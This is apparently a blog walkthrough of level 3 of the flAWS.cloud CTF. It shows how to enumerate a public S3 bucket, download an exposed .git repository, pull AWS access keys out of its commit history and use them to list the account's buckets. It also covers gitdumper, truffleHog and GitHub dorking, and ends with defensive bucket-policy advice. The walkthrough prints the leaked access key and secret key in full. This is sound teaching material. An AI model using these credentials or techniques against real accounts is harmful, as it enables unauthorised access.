flaws.cloud - Level 3

9 minute read Published:

Long time ago I started flAWS.cloud, a CTF-style cloud security game teaching you about cloud-specific vulnerabilities related to bad configurations. Now I took it up again and here is a walkthrough of level 3. Like before we have a public homepage hosted on S3. This time we find a git repository with IAM credentials in the commit history. Using them we can list the buckets and find the link to the next level.
Table of Contents

The previous level 2 illustrated how ACL misconfiguration can accidentally open up S3 buckets to all AWS users anywhere on the world. This was enough to just get the secret we needed. This time it will not be that easy anymore. Again, the starting point is a public website and we can again just list the bucket. But now the secret is hidden.

EDIT 11th Nov 2019: changed the description of this level. I mistakenly assumed you would need an IAM user with access to S3 but you do not. Everything can be done without authentication. This means you do not need your own AWS account for this level.

Level 3

The description of this level says it is fairly similar to the previous one. Thus, we just try again to list the bucket with our dummy user and see what we get. The following call will do the trick:

 $ aws s3api list-objects-v2 --bucket level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request --region us-west-2
{
    "Contents": [
        {
            "Key": ".git/COMMIT_EDITMSG",
            "LastModified": "2017-09-17T15:12:24.000Z",
            "ETag": "\"5f8f2cb9c2664a23f08dd8a070ae7427\"",
            "Size": 52,
            "StorageClass": "STANDARD"
        },
        {
            "Key": ".git/HEAD",
            "LastModified": "2017-09-17T15:12:24.000Z",
            "ETag": "\"4cf2d64e44205fe628ddd534e1151b58\"",
            "Size": 23,
            "StorageClass": "STANDARD"
        },
        ...
        {
            "Key": "index.html",
            "LastModified": "2017-02-27T02:05:16.000Z",
            "ETag": "\"b2d525a43d0d0f84bcc4a8d2cf092170\"",
            "Size": 1703,
            "StorageClass": "STANDARD"
        },
        {
            "Key": "robots.txt",
            "LastModified": "2017-02-27T00:14:33.000Z",
            "ETag": "\"bbbcde0b15cabd06aace1df82d335978\"",
            "Size": 26,
            "StorageClass": "STANDARD"
        }
    ]
}

Great, it works on this bucket too. We find the usual index.html containing this levels homepage, a robots.txt file and then a lot of other files. Some of them have a key starting with .git, which suggests that they belong to a git repository. It looks as if the creator of the homepage did not just deploy the homepage itself, but also the git repository used to develop it.

To explore the repository further, we have to download all the files. A quick way to do that is to use the sync command of the AWS CLI tool. The following command will download the entire bucket to your current local directory:

 $ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud . --no-sign-request --region us-west-2
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/HEAD to .git/HEAD
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/commit-msg.sample to .git/hooks/commit-msg.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/COMMIT_EDITMSG to .git/COMMIT_EDITMSG
...

The git repository is now available and you can work with it just like any developer would. First start by inspecting the files you can see:

 $ ls -la
total 160
drwxr-xr-x 3 root root   4096 Oct 24 13:48 .
drwxrwxrwt 1 root root   4096 Oct 24 13:47 ..
drwxr-xr-x 6 root root   4096 Oct 24 13:48 .git
-rw-r--r-- 1 root root 123637 Oct 24 13:48 authenticated_users.png
-rw-r--r-- 1 root root   1552 Oct 24 13:48 hint1.html
-rw-r--r-- 1 root root   1426 Oct 24 13:48 hint2.html
-rw-r--r-- 1 root root   1247 Oct 24 13:48 hint3.html
-rw-r--r-- 1 root root   1035 Oct 24 13:48 hint4.html
-rw-r--r-- 1 root root   1703 Oct 24 13:48 index.html
-rw-r--r-- 1 root root     26 Oct 24 13:48 robots.txt

Not much to see apart from the main homepage and a few hints (that we do not look at, of course). But what did this homepage look like in the past? We can find out by exploring the development history with git. Use the git command line tool to see the history of the latest commits:

 $ git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <[email protected]>
Date:   Sun Sep 17 09:10:43 2017 -0600

    Oops, accidentally added something I shouldn't have

commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 <[email protected]>
Date:   Sun Sep 17 09:10:07 2017 -0600

    first commit

This is a very short history. There are only two commits. Thus, it is easy to spot the very interesting commit message of the 2nd commit. Sounds like there is something the creator of the homepage does not want others to see. We can compare this commit to the previous one to see what that is:

 $ git diff f52ec03b227ea6094b04e43f475fb0126edb5a61 b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ367LIFB4IJST7QA
-secret_access_key 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

Ooops, looks like the creator accidentally committed some AWS credentials to the repository. A few seconds later, the mistake was spotted and fixed quickly by adding a commit to remove them. Unfortunately, git does not forget and nothing is ever deleted. What might happen if we exchange our dummy user credentials with these and try some requests? First set credentials:

 $ export AWS_ACCESS_KEY_ID=AKIAJ367LIFB4IJST7QA
 $ export AWS_SECRET_ACCESS_KEY=OdNa7m+bqUvF3Bn/qgSnPE1eBpqcBWTjqwV83Lys

The level description mentions we may be able to list other buckets, so lets do that first:

 $ aws s3api list-buckets
{
    "Buckets": [
        {
            "Name": "2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud",
            "CreationDate": "2017-02-18T19:41:52.000Z"
        },
        {
            "Name": "config-bucket-975426262029",
            "CreationDate": "2017-05-29T16:34:53.000Z"
        },
        {
            "Name": "flaws-logs",
            "CreationDate": "2018-07-07T16:09:49.000Z"
        },
        {
            "Name": "flaws.cloud",
            "CreationDate": "2017-02-18T19:40:54.000Z"
        },
        {
            "Name": "level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud",
            "CreationDate": "2017-02-24T05:15:42.000Z"
        },
        {
            "Name": "level3-9afd3927f195e10225021a578e6f78df.flaws.cloud",
            "CreationDate": "2017-02-26T18:29:03.000Z"
        },
        {
            "Name": "level4-1156739cfb264ced6de514971a4bef68.flaws.cloud",
            "CreationDate": "2017-02-26T18:49:31.000Z"
        },
        {
            "Name": "level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud",
            "CreationDate": "2017-02-26T19:49:03.000Z"
        },
        {
            "Name": "level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud",
            "CreationDate": "2017-02-26T19:48:40.000Z"
        },
        {
            "Name": "theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud",
            "CreationDate": "2017-02-26T20:07:13.000Z"
        }
    ],
    "Owner": {
        "DisplayName": "0xdabbad00",
        "ID": "d70419f1cb589d826b5c2b8492082d193bca52b1e6a81082c36c993f367a5d73"
    }
}

Great! We can now see all the buckets for levels 1 to 6. We can go to the next level by checking out the website for the 4th level. Clever people may also think they can now jump to levels 5 and 6 directly. But those pages tell you to not cheat and the actual page is hosted in a subdirectory you can’t see right now.

The flaw

In this level, we found an initial foothold on the account under attack. We found credentials for one if the IAM users and can now perform all actions it is authorized to do.

Multiple issues lead to us being able to do that. Like in the previous level, we were able to use a configuration mistake to list the bucket without special access rights (other than those we gave ourselves). The next issue is that the creator of the homepage pushed the git repository into the bucket hosting the page. In combination with careless handling of AWS credentials, attackers can now get valid credentials. What could have been done to mitigate the danger of that happening?

Prevent bucket listing

By accidentally leaving the bucket open for everyone, we were enabled to list the bucket and discover the git repository. Clearly this misconfiguration is bad and should be avoided. In this case however we do not strictly need this access. Since the website must be publicly available it is always possible to request content via HTTP. S3 will serve all content in the bucket via HTTP, including the git repository. Thus, it is easy to test if a git repository is on a web server. In our case, the following curl command will reveal that there is a repository:

 $ curl http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/HEAD
ref: refs/heads/master

”.git/HEAD” is a file that all git repositories have. Thus you can always just request this file. If you get a response you know there is a repository. There are several other standard file you could download. For a short introduction to file structure, refer to this blog post. The majority of content however is stored under “.git/objects” and file names are SHA-1 hashes of the objects stored in the repository (more on objects here). Their location is not easily predictable.

Under certain circumstances it can be possible to dump a git repository even if the web server does not allow listing files. GitTools provides a script for this purpose. In our example we can use it to get the repository:

 $ ./gitdumper.sh http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/ /tmp/repo
...
[*] Destination folder does not exist
[+] Creating /tmp/repo/.git/
[+] Downloaded: HEAD
...
[+] Downloaded: objects/c2/aab7e03933a858d1765090928dca4013fe2526
...

Note that this does not require any IAM credentials at all. Now we can the result like before to explore the git history and find the keys.

 $ git diff b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 f52ec03b227ea6094b04e43f475fb0126edb5a61
diff --git a/access_keys.txt b/access_keys.txt
new file mode 100644
index 0000000..e3ae6dd
--- /dev/null
+++ b/access_keys.txt
@@ -0,0 +1,2 @@
+access_key AKIAJ367LIFB4IJST7QA
+secret_access_key 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

A word of caution: be careful with git repositories you download from untrusted sources. Always check out the “.git/hooks” folder. It contains the hooks, which are shell scripts that developers like to run automatically on certain git commands like commit, push, or pull. If you carelessly run git commands on a repository, you may accidentally trigger a malicious script. During normal git clones you do not get such hooks but if you download all files from a website you will. Not long ago Git hooks caused some trouble.

Keep secrets out of version control

If no secrets had been committed to the git repository we would not have gained access to the account. Obviously you should never commit them and if you do, you must consider the secret as revealed and rotate credentials. Deleting a secret from master does not delete if from the history of the version control system.

Besides educating your team and checking for such problems in code reviews you can run automated scanners to find secrets. This is handy both for defenders (e.g., make it part of CI) and attackers (because real repositories are huge and manual search takes time). For example, you could use truffleHog. To test drive it, just install with pip install truffleHog, then run it on the repository we dumped in this level and it finds the key for you:

truffleHog --regex --entropy=false /tmp/repo/
~~~~~~~~~~~~~~~~~~~~~
Reason: AWS API Key
Date: 2017-09-17 15:10:43
Hash: b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
Filepath: access_keys.txt
Branch: origin/master
Commit: Oops, accidentally added something I shouldn't have

AKIAJ367LIFB4IJST7QA
~~~~~~~~~~~~~~~~~~~~~
...

Fun fact: this problem does happen a lot even in public GitHub repositories. Try search queries like “DELETE ENV” which are be characteristic for commit messages describing the “fix”. Or check out GitHub dorks repositories like this one. They contain scripts for GitHub scanning.

Don’t deploy Git repositories

The most obvious fix is to just not deploy the Git repository. It is not needed to serve the website and should have never made it to the bucket in the first place. A scan of the Alexa Top 1M conducted in 2015 (see here, German only) found ~10k /1% websites where this mistake was made. Thus, it seems to actually happen quite a bit, albeit not frequently.

To be on the safe side, you can block access to a git repository just in case it does get copied to an S3 bucket. For example, the bucket policy shown below would grant public read to the entire bucket with the first statement. It is required for public website access (AWS docs). The second statement then overrides the first and denies access to the “.git” folder. Remember that Deny trumps Allow and is evaluated first.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid":"PublicRead",
      "Effect":"Allow",
      "Principal": "*",
      "Action":["s3:GetObject"],
      "Resource":["arn:aws:s3:::your-bucket/*"]
    },
    {
      "Sid": "DenyGit",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::your-bucket/.git/*"
    }
  ]
}

Conclusion

This level demonstrated that it is dangerous to commit secrets to Git repositories as well as to make these repositories available on the website. None of this is specific to the cloud or AWS in particular. Still, it is important to know how to configure S3 buckets correctly to avoid it. Key takeaways should be:

  • never commit IAM credentials to Git repositories
  • never deploy Git repositories on your website
  • configure your web server - S3 in this example - to not allow listing and to block access to .git, just in case a repository with a secret gets deployed